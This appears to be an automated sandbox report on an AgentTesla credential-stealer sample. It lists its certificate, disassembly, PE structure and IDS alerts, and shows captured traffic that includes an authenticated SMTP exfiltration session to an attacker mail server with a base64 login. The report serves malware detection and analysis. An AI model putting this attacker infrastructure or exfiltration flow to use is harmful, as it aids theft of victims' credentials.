                                                                  Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 29/07/2022 08:15:36 29/07/2025 08:15:36
                                                                  Subject Chain
                                                                  • E=info@telegram.org, CN=Telegram FZ-LLC, O=Telegram FZ-LLC, L=Dubai, S=Dubai, C=AE, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE, SERIALNUMBER=94349, OID.2.5.4.15=Private Organization
                                                                  Version:3
                                                                  Thumbprint MD5:D26432F60E2A3BBEB3537B78CB826828
                                                                  Thumbprint SHA-1:71AB79E1C8FF155838C37A5299AE215C52BF6D1D
                                                                  Thumbprint SHA-256:BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407
                                                                  Serial:7AE2B5021371F092A904B6FA
                                                                  Instruction
                                                                  jmp 00007F1F34C1BE88h
                                                                  add byte ptr [edx], ch
                                                                  sub al, byte ptr [edx-45F135B8h]
                                                                  xor eax, CC15F219h
                                                                  or esp, dword ptr [ecx+1B948C81h]
                                                                  lea ecx, dword ptr [edx-10h]
                                                                  fldcw word ptr [esp+ebp*2+2E7A03DAh]
                                                                  fdiv dword ptr [ecx+esi*8-4EBF9020h]
                                                                  and ebp, dword ptr [eax+6Ah]
                                                                  inc eax
                                                                  adc al, AFh
                                                                  inc ebx
                                                                  adc byte ptr [edx-341A3688h], al
                                                                  and byte ptr [bx+di], 00000046h
                                                                  xchg eax, esp
                                                                  dec ebx
                                                                  aam C6h
                                                                  std
                                                                  mov ebp, EA97B917h
                                                                  mov ch, 62h
                                                                  mov edx, dword ptr [ebx-7181DC68h]
                                                                  das
                                                                  sbb byte ptr [ecx], bh
                                                                  mov dword ptr [edx+4241EA4Ch], ebp
                                                                  call far fword ptr [esi-34h]
                                                                  outsd
                                                                  jmp far C389h : 7631CD4Ch
                                                                  dec eax
                                                                  std
                                                                  push esp
                                                                  cmp bh, byte ptr [esi+12h]
                                                                  mov word ptr [ecx], ds
                                                                  fidivr dword ptr [ecx-50152C0Ah]
                                                                  jnp 00007F1F34DCA5B9h
                                                                  add ebx, dword ptr [ebp-5A9A85DDh]
                                                                  retf 5FE7h
                                                                  pmaddwd mm5, qword ptr [ebx+edx*4-62h]
                                                                  mov esp, 4FABFBEAh
                                                                  inc ebp
                                                                  int 38h
                                                                  xor ebp, dword ptr [edx-3781D854h]
                                                                  int1
                                                                  test byte ptr [esp+ecx], bl
                                                                  jmp far A0D5h : 18F20BB7h
                                                                  xor dh, byte ptr [eax-33h]
                                                                  ror dword ptr [ecx], FFFFFF9Dh
                                                                  mov esp, 1B387C29h
                                                                  test eax, 610C168Fh
                                                                  mov seg?, word ptr [ebp-6Eh]
                                                                  or eax, 33D56245h
                                                                  dec eax
                                                                  mov ch, 63h
                                                                  js 00007F1F34DCA62Fh
                                                                  cwde
                                                                  insd
                                                                  retf 9ECEh
                                                                  add esi, dword ptr [edx-729DEB77h]
                                                                  jnle 00007F1F34DCA634h
                                                                  and al, C8h
                                                                  fisubr dword ptr [ebp+00h]
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1c81d40x3c.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1cd0000x10b18.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1db0000x2b08.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1e4.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x1c79bc0x1c80009a0ea62ca8deb2d238ae1c4360694d67False0.6657040244654605data6.83339217870378IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .data0x1c90000x3d240x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x1cd0000x10b180x11000124c6c1cd6819c7637ca7967308b1273False0.08262005974264706data3.7429251183206045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x1cd0e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m0.07952797823258015
                                                                  RT_GROUP_ICON0x1dd9100x14data1.15
                                                                  RT_VERSION0x1dd9240x1f4dataGermanGermany0.5
                                                                  DLLImport
                                                                  KERNEL32.DLLGetProcAddress, VirtualAlloc, GetModuleHandleW
                                                                  MSVBVM60.DLL__vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  GermanGermany
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-10T15:17:55.647888+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.449735162.254.34.31587TCP
                                                                  2025-01-10T15:17:55.647888+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449735162.254.34.31587TCP
                                                                  2025-01-10T15:19:34.204660+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.449735162.254.34.31587TCP
                                                                  2025-01-10T15:19:34.204660+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.449735162.254.34.31587TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 15:17:51.969058990 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:51.969108105 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:51.969166994 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.014985085 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.015007019 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.496079922 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.496180058 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.500375032 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.500386953 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.500653028 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.554266930 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.560434103 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.607342958 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.678611040 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.678672075 CET44349734172.67.74.152192.168.2.4
                                                                  Jan 10, 2025 15:17:52.678734064 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:52.696069002 CET49734443192.168.2.4172.67.74.152
                                                                  Jan 10, 2025 15:17:53.954946995 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:53.959896088 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:53.960088968 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:54.640772104 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:54.641338110 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:54.646188021 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:54.805648088 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:54.812599897 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:54.817471981 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:54.975841999 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:54.982007027 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:54.986927032 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.149024963 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.149318933 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.154217958 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.315458059 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.316905022 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.321661949 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.483536959 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.483849049 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.488627911 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.647083998 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.647860050 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.647887945 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.647962093 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.647991896 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:17:55.652754068 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.652770042 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.652828932 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.652837992 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.935142994 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:17:55.979136944 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:19:34.024667025 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:19:34.029546976 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:19:34.204513073 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:19:34.204659939 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:19:34.204720020 CET58749735162.254.34.31192.168.2.4
                                                                  Jan 10, 2025 15:19:34.205461979 CET49735587192.168.2.4162.254.34.31
                                                                  Jan 10, 2025 15:19:34.209542036 CET58749735162.254.34.31192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 15:17:51.957453012 CET6262553192.168.2.41.1.1.1
                                                                  Jan 10, 2025 15:17:51.963998079 CET53626251.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 10, 2025 15:17:51.957453012 CET192.168.2.41.1.1.10x8987Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 10, 2025 15:17:51.963998079 CET1.1.1.1192.168.2.40x8987No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 15:17:51.963998079 CET1.1.1.1192.168.2.40x8987No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 15:17:51.963998079 CET1.1.1.1192.168.2.40x8987No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                  • api.ipify.org
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449734172.67.74.1524437360C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:52 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 14:17:52 UTC424INHTTP/1.1 200 OK
                                                                  Date: Fri, 10 Jan 2025 14:17:52 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffd4b07dde1729b-EWR
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2007&rtt_var=758&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1438423&cwnd=250&unsent_bytes=0&cid=41b993148e57fe98&ts=195&x=0"
                                                                  2025-01-10 14:17:52 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                  Data Ascii: 8.46.123.189


                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  Jan 10, 2025 15:17:54.640772104 CET58749735162.254.34.31192.168.2.4220 server1.educt.shop ESMTP Postfix
                                                                  Jan 10, 2025 15:17:54.641338110 CET49735587192.168.2.4162.254.34.31EHLO 284992
                                                                  Jan 10, 2025 15:17:54.805648088 CET58749735162.254.34.31192.168.2.4250-server1.educt.shop
                                                                  250-PIPELINING
                                                                  250-SIZE 204800000
                                                                  250-ETRN
                                                                  250-STARTTLS
                                                                  250-AUTH PLAIN LOGIN
                                                                  250-AUTH=PLAIN LOGIN
                                                                  250-ENHANCEDSTATUSCODES
                                                                  250-8BITMIME
                                                                  250-DSN
                                                                  250 CHUNKING
                                                                  Jan 10, 2025 15:17:54.812599897 CET49735587192.168.2.4162.254.34.31AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A=
                                                                  Jan 10, 2025 15:17:54.975841999 CET58749735162.254.34.31192.168.2.4334 UGFzc3dvcmQ6
                                                                  Jan 10, 2025 15:17:55.149024963 CET58749735162.254.34.31192.168.2.4235 2.7.0 Authentication successful
                                                                  Jan 10, 2025 15:17:55.149318933 CET49735587192.168.2.4162.254.34.31MAIL FROM:<sendxsenses@vetrys.shop>
                                                                  Jan 10, 2025 15:17:55.315458059 CET58749735162.254.34.31192.168.2.4250 2.1.0 Ok
                                                                  Jan 10, 2025 15:17:55.316905022 CET49735587192.168.2.4162.254.34.31RCPT TO:<senses@vetrys.shop>
                                                                  Jan 10, 2025 15:17:55.483536959 CET58749735162.254.34.31192.168.2.4250 2.1.5 Ok
                                                                  Jan 10, 2025 15:17:55.483849049 CET49735587192.168.2.4162.254.34.31DATA
                                                                  Jan 10, 2025 15:17:55.647083998 CET58749735162.254.34.31192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                  Jan 10, 2025 15:17:55.647991896 CET49735587192.168.2.4162.254.34.31.
                                                                  Jan 10, 2025 15:17:55.935142994 CET58749735162.254.34.31192.168.2.4250 2.0.0 Ok: queued as 63C3E600E9
                                                                  Jan 10, 2025 15:19:34.024667025 CET49735587192.168.2.4162.254.34.31QUIT
                                                                  Jan 10, 2025 15:19:34.204513073 CET58749735162.254.34.31192.168.2.4221 2.0.0 Bye

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:09:17:47
                                                                  Start date:10/01/2025
                                                                  Path:C:\Users\user\Desktop\VYLigyTDuW.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\VYLigyTDuW.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'956'616 bytes
                                                                  MD5 hash:89471F2AE47D710F5B6DB4AFE8A48E77
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:09:17:50
                                                                  Start date:10/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                  Imagebase:0x970000
                                                                  File size:65'440 bytes
                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:21.4%
                                                                    Dynamic/Decrypted Code Coverage:9.3%
                                                                    Signature Coverage:6.2%
                                                                    Total number of Nodes:550
                                                                    Total number of Limit Nodes:68
                                                                    execution_graph 3213 5c54eb __vbaChkstk 3214 5c5535 3213->3214 3217 5c7404 __vbaChkstk 3214->3217 3218 5c7436 3217->3218 3219 5c745c 3218->3219 3220 5c7444 __vbaNew2 3218->3220 3221 5c7463 __vbaChkstk __vbaChkstk 3219->3221 3220->3221 3222 5c74b7 3221->3222 3223 5c74dc 3222->3223 3224 5c74c2 __vbaHresultCheckObj 3222->3224 3225 5c74e9 __vbaNew2 3223->3225 3226 5c7501 3223->3226 3224->3223 3225->3226 3227 5c7519 __vbaNew2 3226->3227 3228 5c7531 3226->3228 3229 5c7538 __vbaObjSetAddref 3227->3229 3228->3229 3230 5c7552 3229->3230 3231 5c755d __vbaHresultCheckObj 3230->3231 3232 5c7574 3230->3232 3233 5c7578 __vbaFreeObj 3231->3233 3232->3233 3236 5c75a5 __vbaChkstk 3233->3236 3235 5c553a 3237 5c75dd __vbaNew2 3236->3237 3238 5c75f8 3236->3238 3237->3238 3239 5c7616 __vbaNew2 3238->3239 3240 5c7631 3238->3240 3241 5c763b __vbaObjSetAddref 3239->3241 3240->3241 3242 5c7658 3241->3242 3243 5c767d 3242->3243 3244 5c7663 __vbaHresultCheckObj 3242->3244 3245 5c7684 __vbaFreeObj 3243->3245 3244->3245 3345 54c9d2 __vbaChkstk 3245->3345 3247 5c7697 3249 5c76b7 __vbaAryLock #644 __vbaAryUnlock 3247->3249 3331 5c769e 3247->3331 3248 5c8041 __vbaAryUnlock 3248->3235 3250 5c76fa 3249->3250 3351 54b3eb __vbaChkstk 3250->3351 3252 5c7710 6 API calls 3253 5c776b __vbaObjSetAddref 3252->3253 3252->3331 3362 54d027 __vbaChkstk __vbaObjSetAddref 3253->3362 3256 5c779b __vbaFreeObj 3257 5c77b7 3256->3257 3256->3331 3258 5c7895 3257->3258 3470 5c805a __vbaChkstk #595 __vbaVarMove __vbaFreeVarList 3257->3470 3259 5c790d 3258->3259 3472 54ce6e __vbaChkstk 3258->3472 3262 5c797d 3259->3262 3484 54e474 9 API calls 3259->3484 3265 5c7992 3262->3265 3489 54c72b __vbaChkstk 3262->3489 3268 5c7a02 3265->3268 3499 54ce0f __vbaChkstk 3265->3499 3272 5c7a7b 3268->3272 3273 54ce6e 4 API calls 3268->3273 3269 5c7922 3269->3262 3277 5c805a 4 API calls 3269->3277 3270 5c805a 4 API calls 3274 5c78f9 __vbaFreeVar 3270->3274 3276 5c7aec 3272->3276 3507 5c81a6 __vbaChkstk 3272->3507 3278 5c7a20 3273->3278 3482 40aa0c 3274->3482 3279 5c7b65 3276->3279 3284 54ce6e 4 API calls 3276->3284 3282 5c7969 __vbaFreeVar 3277->3282 3278->3272 3290 5c805a 4 API calls 3278->3290 3286 5c7bd6 3279->3286 3510 54e6b4 52 API calls 3279->3510 3283 40aa0c 3282->3283 3289 5c7978 __vbaSetSystemError 3283->3289 3291 5c7b0a 3284->3291 3292 5c7c47 3286->3292 3516 54cd59 6 API calls 3286->3516 3289->3262 3295 5c7a67 __vbaFreeVar 3290->3295 3291->3279 3301 5c805a 4 API calls 3291->3301 3303 5c7e91 3292->3303 3309 5c7cae __vbaAryLock 3292->3309 3300 40aa0c 3295->3300 3297 5c7b7b 3297->3286 3310 5c805a 4 API calls 3297->3310 3306 5c7a76 __vbaSetSystemError 3300->3306 3307 5c7b51 __vbaFreeVar 3301->3307 3308 5c7fb1 #644 3303->3308 3315 5c7f3f 3303->3315 3316 5c7ecb 3303->3316 3306->3272 3312 40aa0c 3307->3312 3559 54b152 3308->3559 3520 54cef9 6 API calls 3309->3520 3318 5c7bc2 __vbaFreeVar 3310->3318 3323 5c7b60 __vbaSetSystemError 3312->3323 3465 40a98c 3315->3465 3326 40a98c 155 API calls 3316->3326 3321 40aa0c 3318->3321 3320 5c7cec 8 API calls 3530 54c8b0 __vbaChkstk __vbaVarVargNofree __vbaStrVarVal #644 3320->3530 3328 5c7bd1 __vbaSetSystemError 3321->3328 3323->3279 3325 5c7fd4 #644 3325->3331 3332 5c7ed9 __vbaSetSystemError __vbaAryLock 3326->3332 3328->3286 3329 5c7f4d __vbaSetSystemError __vbaAryLock 3335 54cb74 24 API calls 3329->3335 3331->3248 3544 54cb74 __vbaChkstk 3332->3544 3339 5c7fa0 __vbaAryUnlock __vbaFreeVar 3335->3339 3339->3308 3560 54cab5 __vbaChkstk 3345->3560 3347 54ca09 #644 3348 54ca1e 3347->3348 3349 54ca24 __vbaRedim __vbaAryLock #644 __vbaAryUnlock 3348->3349 3350 54ca89 3348->3350 3349->3350 3350->3247 3561 54b4d6 __vbaChkstk 3351->3561 3354 54b43f 3354->3252 3355 54b441 #644 3566 54b152 3355->3566 3357 54b45b #644 3567 54b152 3357->3567 3359 54b475 #644 3568 54b152 3359->3568 3361 54b493 #644 #644 3361->3354 3363 54d082 3362->3363 3364 54d0a7 3363->3364 3365 54d08d __vbaHresultCheckObj 3363->3365 3366 54d0c1 __vbaObjSetAddref 3364->3366 3405 54d0bc 6 API calls 3364->3405 3365->3364 3569 54eec1 __vbaChkstk __vbaObjSetAddref __vbaVarMove 3366->3569 3369 54d0d7 7 API calls 3370 54eec1 17 API calls 3369->3370 3371 54d128 6 API calls 3370->3371 3372 54d17e 3371->3372 3373 54d1a3 3372->3373 3374 54d189 __vbaHresultCheckObj 3372->3374 3375 54d1d0 __vbaHresultCheckObj 3373->3375 3376 54d1ea 3373->3376 3374->3373 3375->3376 3377 54d217 __vbaHresultCheckObj 3376->3377 3378 54d231 3376->3378 3379 54d238 __vbaObjSetAddref 3377->3379 3378->3379 3583 54ed02 __vbaChkstk __vbaObjSetAddref 3379->3583 3381 54d24a __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref 3382 54ed02 10 API calls 3381->3382 3383 54d286 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref 3382->3383 3384 54ed02 10 API calls 3383->3384 3385 54d2c2 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj 3384->3385 3386 54d307 3385->3386 3387 54d312 __vbaHresultCheckObj 3386->3387 3388 54d32c 3386->3388 3387->3388 3389 54d373 3388->3389 3390 54d359 __vbaHresultCheckObj 3388->3390 3391 54d3a0 __vbaHresultCheckObj 3389->3391 3392 54d3ba 3389->3392 3390->3389 3391->3392 3393 54d3e1 __vbaHresultCheckObj 3392->3393 3394 54d3fb 3392->3394 3395 54d402 __vbaRedim __vbaAryLock 3393->3395 3394->3395 3396 54d44f 3395->3396 3397 54d474 3396->3397 3398 54d45a __vbaHresultCheckObj 3396->3398 3399 54d47b __vbaAryUnlock 3397->3399 3398->3399 3400 54d494 3399->3400 3401 54d4b6 3399->3401 3592 54e01f __vbaChkstk __vbaVarVargNofree __vbaStrVarCopy __vbaStrMove 3400->3592 3403 54d4db 